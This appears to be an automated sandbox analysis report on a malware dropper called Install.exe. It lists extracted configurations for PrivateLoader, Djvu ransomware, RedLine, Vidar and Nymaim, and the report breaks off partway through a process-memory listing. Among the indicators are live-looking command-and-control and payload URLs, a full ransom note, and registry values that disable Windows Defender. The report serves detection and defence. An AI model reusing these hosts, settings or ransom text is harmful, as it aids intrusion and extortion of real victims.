Analysis
-
max time kernel
85s -
max time network
208s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 20:04
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v2004-20220812-en
General
-
Target
Install.exe
-
Size
686.7MB
-
MD5
27653c835f31dcb8aca420f8ef5eb421
-
SHA1
fe3353e2257cfab6b6320db281acd67702131486
-
SHA256
80a1fc5830602b1c5ec1fa6439c3b4189558fd4deaa175e732de9f956ddf55c2
-
SHA512
2149f983b7e4bd123917beb324a8d5b7d60acd718c675a176939378901f5c98ac2b652ec2c095ce723d4de00350c5f9806b1d5a3b8467106075bc8ecf615b879
-
SSDEEP
98304:kKiI2ZBtRK7IF1RXsMfWMIl6a6KLmKF0rVKwK8kuvG:r2p7OqWRsa6KKKFGRK8dG
Malware Config
Extracted
privateloader
http://163.123.143.4/proxies.txt
http://107.182.129.251/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
163.123.143.12
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
-
payload_url
https://vipsofts.xyz/files/mega.bmp
Extracted
djvu
http://winnlinne.com/test3/get.php
http://winnlinne.com/lancer/get.php
-
extension
.ofoq
-
offline_id
xkNzhkB1wvgoDI7Uo0HPNLY3qCuwoFpP7nlhlut1
-
payload_url
http://rgyui.top/dl/build2.exe
http://winnlinne.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-EWKSsSJiVn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0568Jhyjd
Extracted
nymaim
208.67.104.97
85.31.46.167
Extracted
redline
nam6.5
103.89.90.61:34589
-
auth_value
ea8cbb51ed8a91dcbe95697e8bb9a9d7
Extracted
redline
1
79.110.62.196:35726
-
auth_value
4b711fa6f9a5187b40500266349c0baf
Extracted
redline
Buk2
tyastazirowi.xyz:80
yaterirennin.xyz:80
-
auth_value
813662de00b041e18fa868da733fca07
Extracted
vidar
54.7
517
https://t.me/trampapanam
https://nerdculture.de/@yoxhyp
-
profile_id
517
Signatures
-
Detected Djvu ransomware 13 IoCs
Processes:
resource yara_rule behavioral2/memory/1596-178-0x0000000002360000-0x000000000247B000-memory.dmp family_djvu behavioral2/memory/1464-189-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1464-203-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1464-186-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1464-182-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1464-257-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/1464-313-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4756-344-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4756-346-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/4756-349-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/50856-390-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/50856-394-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/50856-392-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1640-187-0x00000000005F0000-0x00000000005F9000-memory.dmp family_smokeloader behavioral2/memory/48600-324-0x00000000005B0000-0x00000000005B9000-memory.dmp family_smokeloader behavioral2/memory/48972-341-0x00000000006C0000-0x00000000006C9000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Processes:
ZWuWYy0htiErP6uyYmeg_lrh.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ZWuWYy0htiErP6uyYmeg_lrh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ZWuWYy0htiErP6uyYmeg_lrh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ZWuWYy0htiErP6uyYmeg_lrh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ZWuWYy0htiErP6uyYmeg_lrh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" ZWuWYy0htiErP6uyYmeg_lrh.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection ZWuWYy0htiErP6uyYmeg_lrh.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ZWuWYy0htiErP6uyYmeg_lrh.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 49656 528 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/504-206-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/2196-338-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/2196-340-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/50956-396-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
Processes:
p0AC6yBn3ASw6LWWgTDhKQqw.exeGkkW3wKWJfoKEXtbVraCoY_5.exegWG8uPeowFtgqwbOzyuVCCwk.exeurnbMH0oDvkrvbrpwkSgNldb.exeJ944jgl51CX33DHRnoas0zh1.exevUAFUhj9jvoWazidiFp5wtjX.exedMx8nhhpXavZ4uPJ5zOMtF7f.exelFyZ92vXmfbnHdGnC1PY_RhC.exe89H2U6T799E_xQqJCTJUsYKn.exexLmGFtewVGx31R1dEvJapWTf.exexqKmRxyI9yMan9smqcBne3I2.exeInstall.exeInstall.exedMx8nhhpXavZ4uPJ5zOMtF7f.exeSETUP_~1.EXElFyZ92vXmfbnHdGnC1PY_RhC.exeZWuWYy0htiErP6uyYmeg_lrh.exeJXbJr960t8tSnYPT5IhyFDef.exereg.exe2xV1QhA_FyWHbC_Ts_agbR1z.exerWwyn2wp2r3f3edrLrpj0kDl.exebLEtFTHBvIMC_0CNOqyvtfQv.exereg.exeraMWZlmzPzIWdy_mnHCloZxp.exepid process 4304 p0AC6yBn3ASw6LWWgTDhKQqw.exe 4472 GkkW3wKWJfoKEXtbVraCoY_5.exe 1640 gWG8uPeowFtgqwbOzyuVCCwk.exe 3940 urnbMH0oDvkrvbrpwkSgNldb.exe 3504 J944jgl51CX33DHRnoas0zh1.exe 2832 vUAFUhj9jvoWazidiFp5wtjX.exe 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe 4988 89H2U6T799E_xQqJCTJUsYKn.exe 2928 xLmGFtewVGx31R1dEvJapWTf.exe 1984 xqKmRxyI9yMan9smqcBne3I2.exe 1440 Install.exe 4236 Install.exe 1464 dMx8nhhpXavZ4uPJ5zOMtF7f.exe 1016 SETUP_~1.EXE 504 lFyZ92vXmfbnHdGnC1PY_RhC.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 48412 JXbJr960t8tSnYPT5IhyFDef.exe 48424 reg.exe 48444 2xV1QhA_FyWHbC_Ts_agbR1z.exe 48456 rWwyn2wp2r3f3edrLrpj0kDl.exe 48488 bLEtFTHBvIMC_0CNOqyvtfQv.exe 48468 reg.exe 48480 raMWZlmzPzIWdy_mnHCloZxp.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\JXbJr960t8tSnYPT5IhyFDef.exe upx C:\Users\Admin\Pictures\Adobe Films\JXbJr960t8tSnYPT5IhyFDef.exe upx C:\Users\Admin\Pictures\Adobe Films\SPZ393HzxUB1bmQbFruskOBR.exe upx C:\Users\Admin\Pictures\Adobe Films\SPZ393HzxUB1bmQbFruskOBR.exe upx C:\Users\Admin\Pictures\Adobe Films\XGnhX4XLQ5xsCqwCSSpM2ZQp.exe upx C:\Users\Admin\Pictures\Adobe Films\XGnhX4XLQ5xsCqwCSSpM2ZQp.exe upx C:\Users\Admin\Pictures\Adobe Films\I208dVzUSqOgVhrIH_fKKOx5.exe upx C:\Users\Admin\Pictures\Adobe Films\I208dVzUSqOgVhrIH_fKKOx5.exe upx behavioral2/memory/48516-316-0x0000000000710000-0x0000000001990000-memory.dmp upx behavioral2/memory/48468-306-0x00000000005F0000-0x000000000189E000-memory.dmp upx behavioral2/memory/48412-297-0x0000000000C70000-0x0000000001F2B000-memory.dmp upx behavioral2/memory/48424-321-0x0000000000F10000-0x00000000021CC000-memory.dmp upx behavioral2/memory/48412-353-0x0000000000C70000-0x0000000001F2B000-memory.dmp upx behavioral2/memory/48516-355-0x0000000000710000-0x0000000001990000-memory.dmp upx -
Processes:
resource yara_rule C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exe vmprotect C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exe vmprotect behavioral2/memory/2832-162-0x0000000140000000-0x000000014060E000-memory.dmp vmprotect behavioral2/memory/48628-305-0x0000000140000000-0x000000014060E000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeurnbMH0oDvkrvbrpwkSgNldb.exeJ944jgl51CX33DHRnoas0zh1.exeInstall.exeSETUP_~1.EXEZWuWYy0htiErP6uyYmeg_lrh.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation urnbMH0oDvkrvbrpwkSgNldb.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation J944jgl51CX33DHRnoas0zh1.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation SETUP_~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation ZWuWYy0htiErP6uyYmeg_lrh.exe -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 3544 rundll32.exe 48304 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 7 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
xqKmRxyI9yMan9smqcBne3I2.exedMx8nhhpXavZ4uPJ5zOMtF7f.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce xqKmRxyI9yMan9smqcBne3I2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" xqKmRxyI9yMan9smqcBne3I2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\164adf43-3388-47f0-8c7f-57eba9c2a483\\dMx8nhhpXavZ4uPJ5zOMtF7f.exe\" --AutoStart" dMx8nhhpXavZ4uPJ5zOMtF7f.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 310 api.2ip.ua 311 api.2ip.ua 131 ipinfo.io 226 api.2ip.ua 267 api.2ip.ua 107 ipinfo.io 108 api.2ip.ua 109 api.2ip.ua 21 ipinfo.io 22 ipinfo.io 106 ipinfo.io -
Drops file in System32 directory 5 IoCs
Processes:
Install.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
dMx8nhhpXavZ4uPJ5zOMtF7f.exelFyZ92vXmfbnHdGnC1PY_RhC.exedescription pid process target process PID 1596 set thread context of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 2436 set thread context of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe -
Drops file in Program Files directory 2 IoCs
Processes:
J944jgl51CX33DHRnoas0zh1.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe J944jgl51CX33DHRnoas0zh1.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe J944jgl51CX33DHRnoas0zh1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2724 2832 WerFault.exe vUAFUhj9jvoWazidiFp5wtjX.exe 4080 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 30780 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 31184 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 31424 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 33348 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 33596 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 48004 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 2872 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 1088 48628 WerFault.exe E2wjsC5vzAhP_HKqoOZze8Cw.exe 49068 48972 WerFault.exe bpkZIh67SfrjIoXdygIq2sUj.exe 48364 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 49680 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 48804 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 31592 48904 WerFault.exe rundll32.exe 50156 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 48684 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 49752 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 50576 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 50592 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 48724 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe 72364 4472 WerFault.exe GkkW3wKWJfoKEXtbVraCoY_5.exe 103008 48524 WerFault.exe E2wmNUePF6O32h75mC_Ck9Zw.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
gWG8uPeowFtgqwbOzyuVCCwk.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gWG8uPeowFtgqwbOzyuVCCwk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gWG8uPeowFtgqwbOzyuVCCwk.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gWG8uPeowFtgqwbOzyuVCCwk.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 48600 schtasks.exe 72548 schtasks.exe 4416 schtasks.exe 4900 schtasks.exe 2096 schtasks.exe 33668 schtasks.exe 48300 schtasks.exe 4140 schtasks.exe 50556 schtasks.exe 53556 schtasks.exe 3476 schtasks.exe 30740 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 33388 timeout.exe 3588 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 55964 tasklist.exe 72492 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 51988 taskkill.exe 103272 taskkill.exe 49792 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
Install.exeurnbMH0oDvkrvbrpwkSgNldb.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Install.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings urnbMH0oDvkrvbrpwkSgNldb.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 231 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Install.exegWG8uPeowFtgqwbOzyuVCCwk.exedMx8nhhpXavZ4uPJ5zOMtF7f.exeZWuWYy0htiErP6uyYmeg_lrh.exepid process 1076 Install.exe 1076 Install.exe 1640 gWG8uPeowFtgqwbOzyuVCCwk.exe 1640 gWG8uPeowFtgqwbOzyuVCCwk.exe 1464 dMx8nhhpXavZ4uPJ5zOMtF7f.exe 1464 dMx8nhhpXavZ4uPJ5zOMtF7f.exe 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 1124 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 30396 ZWuWYy0htiErP6uyYmeg_lrh.exe 1124 1124 1124 1124 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1124 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
gWG8uPeowFtgqwbOzyuVCCwk.exepid process 1640 gWG8uPeowFtgqwbOzyuVCCwk.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
SETUP_~1.EXEpowershell.exelFyZ92vXmfbnHdGnC1PY_RhC.exedescription pid process Token: SeDebugPrivilege 1016 SETUP_~1.EXE Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeDebugPrivilege 31652 powershell.exe Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeShutdownPrivilege 1124 Token: SeCreatePagefilePrivilege 1124 Token: SeDebugPrivilege 504 lFyZ92vXmfbnHdGnC1PY_RhC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Install.exeurnbMH0oDvkrvbrpwkSgNldb.exep0AC6yBn3ASw6LWWgTDhKQqw.exedMx8nhhpXavZ4uPJ5zOMtF7f.exeInstall.execontrol.exelFyZ92vXmfbnHdGnC1PY_RhC.exexqKmRxyI9yMan9smqcBne3I2.exedescription pid process target process PID 1076 wrote to memory of 4304 1076 Install.exe p0AC6yBn3ASw6LWWgTDhKQqw.exe PID 1076 wrote to memory of 4304 1076 Install.exe p0AC6yBn3ASw6LWWgTDhKQqw.exe PID 1076 wrote to memory of 4304 1076 Install.exe p0AC6yBn3ASw6LWWgTDhKQqw.exe PID 1076 wrote to memory of 4472 1076 Install.exe GkkW3wKWJfoKEXtbVraCoY_5.exe PID 1076 wrote to memory of 4472 1076 Install.exe GkkW3wKWJfoKEXtbVraCoY_5.exe PID 1076 wrote to memory of 4472 1076 Install.exe GkkW3wKWJfoKEXtbVraCoY_5.exe PID 1076 wrote to memory of 3504 1076 Install.exe J944jgl51CX33DHRnoas0zh1.exe PID 1076 wrote to memory of 3504 1076 Install.exe J944jgl51CX33DHRnoas0zh1.exe PID 1076 wrote to memory of 3504 1076 Install.exe J944jgl51CX33DHRnoas0zh1.exe PID 1076 wrote to memory of 1640 1076 Install.exe gWG8uPeowFtgqwbOzyuVCCwk.exe PID 1076 wrote to memory of 1640 1076 Install.exe gWG8uPeowFtgqwbOzyuVCCwk.exe PID 1076 wrote to memory of 1640 1076 Install.exe gWG8uPeowFtgqwbOzyuVCCwk.exe PID 1076 wrote to memory of 3940 1076 Install.exe urnbMH0oDvkrvbrpwkSgNldb.exe PID 1076 wrote to memory of 3940 1076 Install.exe urnbMH0oDvkrvbrpwkSgNldb.exe PID 1076 wrote to memory of 3940 1076 Install.exe urnbMH0oDvkrvbrpwkSgNldb.exe PID 1076 wrote to memory of 1596 1076 Install.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1076 wrote to memory of 1596 1076 Install.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1076 wrote to memory of 1596 1076 Install.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1076 wrote to memory of 2832 1076 Install.exe vUAFUhj9jvoWazidiFp5wtjX.exe PID 1076 wrote to memory of 2832 1076 Install.exe vUAFUhj9jvoWazidiFp5wtjX.exe PID 1076 wrote to memory of 2436 1076 Install.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 1076 wrote to memory of 2436 1076 Install.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 1076 wrote to memory of 2436 1076 Install.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 1076 wrote to memory of 4988 1076 Install.exe 89H2U6T799E_xQqJCTJUsYKn.exe PID 1076 wrote to memory of 4988 1076 Install.exe 89H2U6T799E_xQqJCTJUsYKn.exe PID 1076 wrote to memory of 4988 1076 Install.exe 89H2U6T799E_xQqJCTJUsYKn.exe PID 1076 wrote to memory of 2928 1076 Install.exe xLmGFtewVGx31R1dEvJapWTf.exe PID 1076 wrote to memory of 2928 1076 Install.exe xLmGFtewVGx31R1dEvJapWTf.exe PID 1076 wrote to memory of 2928 1076 Install.exe xLmGFtewVGx31R1dEvJapWTf.exe PID 1076 wrote to memory of 1984 1076 Install.exe xqKmRxyI9yMan9smqcBne3I2.exe PID 1076 wrote to memory of 1984 1076 Install.exe xqKmRxyI9yMan9smqcBne3I2.exe PID 3940 wrote to memory of 3796 3940 urnbMH0oDvkrvbrpwkSgNldb.exe control.exe PID 3940 wrote to memory of 3796 3940 urnbMH0oDvkrvbrpwkSgNldb.exe control.exe PID 3940 wrote to memory of 3796 3940 urnbMH0oDvkrvbrpwkSgNldb.exe control.exe PID 4304 wrote to memory of 1440 4304 p0AC6yBn3ASw6LWWgTDhKQqw.exe Install.exe PID 4304 wrote to memory of 1440 4304 p0AC6yBn3ASw6LWWgTDhKQqw.exe Install.exe PID 4304 wrote to memory of 1440 4304 p0AC6yBn3ASw6LWWgTDhKQqw.exe Install.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1440 wrote to memory of 4236 1440 Install.exe Install.exe PID 1440 wrote to memory of 4236 1440 Install.exe Install.exe PID 1440 wrote to memory of 4236 1440 Install.exe Install.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 1596 wrote to memory of 1464 1596 dMx8nhhpXavZ4uPJ5zOMtF7f.exe 